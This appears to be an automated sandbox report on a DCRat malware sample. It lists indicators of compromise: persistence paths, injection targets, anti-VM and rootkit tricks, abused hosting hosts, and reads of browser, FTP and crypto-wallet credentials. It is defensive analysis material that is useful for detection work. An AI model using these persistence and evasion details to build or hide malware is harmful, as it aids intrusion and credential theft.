dcrat | 7cd975ad9527659ded0174215814798afbbe615dfe5012b9def89e9d9f2bcbd5

System Information Discovery

Processes:

Install.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exeInstall.exeWYPUIGgN6vuEmknhIqzgRSQb.exeAe5Ds0abnrSUcQoZSmERk4De.exeGHDHJEBFBF.exeTXPKdNZ.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	WYPUIGgN6vuEmknhIqzgRSQb.exe
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	Ae5Ds0abnrSUcQoZSmERk4De.exe
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	GHDHJEBFBF.exe
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	TXPKdNZ.exe

Drops startup file 1 IoCs

Processes:

WYPUIGgN6vuEmknhIqzgRSQb.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk	WYPUIGgN6vuEmknhIqzgRSQb.exe

Executes dropped EXE 30 IoCs

Processes:

QaDS18iYQkgVOw5MGDctxUWY.exe5tNzlR9NhYdEFhuQB2NB_AGP.exevW4Nbn3LNaPo1GRZeUVmW5rG.exebfnZhb9C4kEsGiqq6uh2DkGw.exeT0Low6kfxfOVSTCz1xKuW3FF.exeA8mFXN9X10tndnylrvwhkeAG.exe6AZO5Het33oIWLnZ2TsVqcYJ.exeAe5Ds0abnrSUcQoZSmERk4De.exefI0Z7Px_wurPZCnUR9jY5Gfn.exeXR9aCbvSeH0PNmiOfR0DyV7v.exejsinW_BETWxrFBeb1xXIjCeh.exe6AZO5Het33oIWLnZ2TsVqcYJ.tmpWYPUIGgN6vuEmknhIqzgRSQb.exel8l9RRY3_DDsTnswn30f44qI.exesmTf9RkOSDoC4v5y22bl3fvg.exeshgenerator.exe7_yhNfarqM1lgLovwKi2qclO.exeInstall.exeshgenerator.exeXR9aCbvSeH0PNmiOfR0DyV7v.exe5tNzlR9NhYdEFhuQB2NB_AGP.exeWYPUIGgN6vuEmknhIqzgRSQb.exedckuybanmlgp.execsrss.exeGHDHJEBFBF.exeinjector.exewindefender.exewindefender.exeXqppFsW.exeTXPKdNZ.exe

pid	process
2036	QaDS18iYQkgVOw5MGDctxUWY.exe
2888	5tNzlR9NhYdEFhuQB2NB_AGP.exe
2668	vW4Nbn3LNaPo1GRZeUVmW5rG.exe
4484	bfnZhb9C4kEsGiqq6uh2DkGw.exe
2660	T0Low6kfxfOVSTCz1xKuW3FF.exe
2028	A8mFXN9X10tndnylrvwhkeAG.exe
5048	6AZO5Het33oIWLnZ2TsVqcYJ.exe
4164	Ae5Ds0abnrSUcQoZSmERk4De.exe
3188	fI0Z7Px_wurPZCnUR9jY5Gfn.exe
1244	XR9aCbvSeH0PNmiOfR0DyV7v.exe
868	jsinW_BETWxrFBeb1xXIjCeh.exe
4084	6AZO5Het33oIWLnZ2TsVqcYJ.tmp
884	WYPUIGgN6vuEmknhIqzgRSQb.exe
1864	l8l9RRY3_DDsTnswn30f44qI.exe
4304	smTf9RkOSDoC4v5y22bl3fvg.exe
4384	shgenerator.exe
4196	7_yhNfarqM1lgLovwKi2qclO.exe
4904	Install.exe
3340	shgenerator.exe
4092	XR9aCbvSeH0PNmiOfR0DyV7v.exe
1884	5tNzlR9NhYdEFhuQB2NB_AGP.exe
4916	WYPUIGgN6vuEmknhIqzgRSQb.exe
4068	dckuybanmlgp.exe
456	csrss.exe
1456	GHDHJEBFBF.exe
2096	injector.exe
4752	windefender.exe
1616	windefender.exe
2444	XqppFsW.exe
4236	TXPKdNZ.exe

Loads dropped DLL 7 IoCs

Processes:

6AZO5Het33oIWLnZ2TsVqcYJ.tmpAe5Ds0abnrSUcQoZSmERk4De.exesmTf9RkOSDoC4v5y22bl3fvg.exerundll32.exe

pid	process
4084	6AZO5Het33oIWLnZ2TsVqcYJ.tmp
4084	6AZO5Het33oIWLnZ2TsVqcYJ.tmp
4084	6AZO5Het33oIWLnZ2TsVqcYJ.tmp
4164	Ae5Ds0abnrSUcQoZSmERk4De.exe
4164	Ae5Ds0abnrSUcQoZSmERk4De.exe
4304	smTf9RkOSDoC4v5y22bl3fvg.exe
2364	rundll32.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

csrss.exeWYPUIGgN6vuEmknhIqzgRSQb.exeXR9aCbvSeH0PNmiOfR0DyV7v.exe5tNzlR9NhYdEFhuQB2NB_AGP.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe"	WYPUIGgN6vuEmknhIqzgRSQb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	XR9aCbvSeH0PNmiOfR0DyV7v.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	5tNzlR9NhYdEFhuQB2NB_AGP.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

Processes:

TXPKdNZ.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	TXPKdNZ.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	TXPKdNZ.exe

Drops desktop.ini file(s) 1 IoCs

Processes:

TXPKdNZ.exe

description ioc process

File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini TXPKdNZ.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service
T1102

Processes:

flow ioc

23 bitbucket.org
40 bitbucket.org
50 bitbucket.org
77 bitbucket.org
148 iplogger.org
149 iplogger.org
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

9 ipinfo.io
13 ipinfo.io
5 api.myip.com
6 api.myip.com
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMonFS csrss.exe

description	ioc	process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	TXPKdNZ.exe

flow	ioc
23	bitbucket.org
40	bitbucket.org
50	bitbucket.org
77	bitbucket.org
148	iplogger.org
149	iplogger.org

flow	ioc
9	ipinfo.io
13	ipinfo.io
5	api.myip.com
6	api.myip.com

description	ioc	process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 42 IoCs

Processes:

XqppFsW.exeTXPKdNZ.exe6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeInstall.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	XqppFsW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	TXPKdNZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	TXPKdNZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15	TXPKdNZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15	TXPKdNZ.exe
File opened for modification	C:\Windows\System32\GroupPolicy	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91	TXPKdNZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	TXPKdNZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	TXPKdNZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	TXPKdNZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	TXPKdNZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	TXPKdNZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	TXPKdNZ.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	TXPKdNZ.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15	TXPKdNZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306	TXPKdNZ.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15	TXPKdNZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306	TXPKdNZ.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	TXPKdNZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	TXPKdNZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	TXPKdNZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	TXPKdNZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	TXPKdNZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	TXPKdNZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91	TXPKdNZ.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	6be4950d9a919f5d0150d19552b340e9b5ef1959a18fd97b18778bf39e1a6421.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	XqppFsW.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

QaDS18iYQkgVOw5MGDctxUWY.exel8l9RRY3_DDsTnswn30f44qI.exe7_yhNfarqM1lgLovwKi2qclO.exedckuybanmlgp.exesmTf9RkOSDoC4v5y22bl3fvg.exe

description	pid	process	target process
PID 2036 set thread context of 4460	2036	QaDS18iYQkgVOw5MGDctxUWY.exe	RegAsm.exe
PID 1864 set thread context of 4964	1864	l8l9RRY3_DDsTnswn30f44qI.exe	RegAsm.exe
PID 4196 set thread context of 3352	4196	7_yhNfarqM1lgLovwKi2qclO.exe	RegAsm.exe
PID 4068 set thread context of 2388	4068	dckuybanmlgp.exe	conhost.exe
PID 4068 set thread context of 3796	4068	dckuybanmlgp.exe	svchost.exe
PID 4304 set thread context of 3136	4304	smTf9RkOSDoC4v5y22bl3fvg.exe	MsBuild.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

Processes:

5tNzlR9NhYdEFhuQB2NB_AGP.exeXR9aCbvSeH0PNmiOfR0DyV7v.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	5tNzlR9NhYdEFhuQB2NB_AGP.exe
File opened (read-only)	\??\VBoxMiniRdrDN	XR9aCbvSeH0PNmiOfR0DyV7v.exe

Drops file in Program Files directory 14 IoCs

Processes:

TXPKdNZ.exe

description	ioc	process
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	TXPKdNZ.exe
File created	C:\Program Files (x86)\KuTytnbkU\ofzfZry.xml	TXPKdNZ.exe
File created	C:\Program Files (x86)\JqMoIWPtRqoDC\zWJaVYG.dll	TXPKdNZ.exe
File created	C:\Program Files (x86)\iyzAqDqghgpU2\sKaOzsk.xml	TXPKdNZ.exe
File created	C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR\eXAxSGO.dll	TXPKdNZ.exe
File created	C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR\EPuDQgZ.xml	TXPKdNZ.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	TXPKdNZ.exe
File created	C:\Program Files (x86)\iyzAqDqghgpU2\yHDgFLKUBuRnW.dll	TXPKdNZ.exe
File created	C:\Program Files (x86)\UotyJsAgSFUn\BPLKTMP.dll	TXPKdNZ.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	TXPKdNZ.exe
File created	C:\Program Files (x86)\JqMoIWPtRqoDC\EOzmhhw.xml	TXPKdNZ.exe
File created	C:\Program Files (x86)\KuTytnbkU\HgLUun.dll	TXPKdNZ.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	TXPKdNZ.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	TXPKdNZ.exe

Drops file in Windows directory 10 IoCs

Processes:

schtasks.exe5tNzlR9NhYdEFhuQB2NB_AGP.execsrss.exeschtasks.exeschtasks.exeXR9aCbvSeH0PNmiOfR0DyV7v.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\btbwILgIDOMomJfKYB.job	schtasks.exe
File opened for modification	C:\Windows\rss	5tNzlR9NhYdEFhuQB2NB_AGP.exe
File created	C:\Windows\rss\csrss.exe	5tNzlR9NhYdEFhuQB2NB_AGP.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Tasks\tbikxcbubRAutxvXV.job	schtasks.exe
File created	C:\Windows\Tasks\uWHYFRHVxuNygqWgi.job	schtasks.exe
File created	C:\Windows\rss\csrss.exe	XR9aCbvSeH0PNmiOfR0DyV7v.exe
File created	C:\Windows\Tasks\BDcYZHwUBrpBRcy.job	schtasks.exe
File opened for modification	C:\Windows\rss	XR9aCbvSeH0PNmiOfR0DyV7v.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

636 sc.exe
3692 sc.exe
4540 sc.exe
4436 sc.exe
3100 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
636	sc.exe
3692	sc.exe
4540	sc.exe
4436	sc.exe
3100	sc.exe

Program crash 7 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4616	2036	WerFault.exe	QaDS18iYQkgVOw5MGDctxUWY.exe
4752	4196	WerFault.exe	7_yhNfarqM1lgLovwKi2qclO.exe
4688	1864	WerFault.exe	l8l9RRY3_DDsTnswn30f44qI.exe
3424	4460	WerFault.exe	RegAsm.exe
1740	4888	WerFault.exe	powershell.exe
4540	4964	WerFault.exe	RegAsm.exe
1924	4164	WerFault.exe	Ae5Ds0abnrSUcQoZSmERk4De.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

A8mFXN9X10tndnylrvwhkeAG.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	A8mFXN9X10tndnylrvwhkeAG.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	A8mFXN9X10tndnylrvwhkeAG.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	A8mFXN9X10tndnylrvwhkeAG.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

Ae5Ds0abnrSUcQoZSmERk4De.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Ae5Ds0abnrSUcQoZSmERk4De.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Ae5Ds0abnrSUcQoZSmERk4De.exe

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1268	schtasks.exe
2424	schtasks.exe
2492	schtasks.exe
3616	schtasks.exe
3080	schtasks.exe
1052	schtasks.exe
4512	schtasks.exe
1380	schtasks.exe
4596	schtasks.exe
448	schtasks.exe
4264	schtasks.exe
1760	schtasks.exe
4440	schtasks.exe
368	schtasks.exe
3672	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

Processes:

rundll32.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exewindefender.exeXR9aCbvSeH0PNmiOfR0DyV7v.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1471 = "Magadan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	XR9aCbvSeH0PNmiOfR0DyV7v.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	XR9aCbvSeH0PNmiOfR0DyV7v.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time"	XR9aCbvSeH0PNmiOfR0DyV7v.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	XR9aCbvSeH0PNmiOfR0DyV7v.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-661 = "Cen. Australia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	XR9aCbvSeH0PNmiOfR0DyV7v.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	XR9aCbvSeH0PNmiOfR0DyV7v.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	XR9aCbvSeH0PNmiOfR0DyV7v.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1841 = "Russia TZ 4 Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	XR9aCbvSeH0PNmiOfR0DyV7v.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2042 = "Eastern Standard Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2512 = "Lord Howe Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	XR9aCbvSeH0PNmiOfR0DyV7v.exe
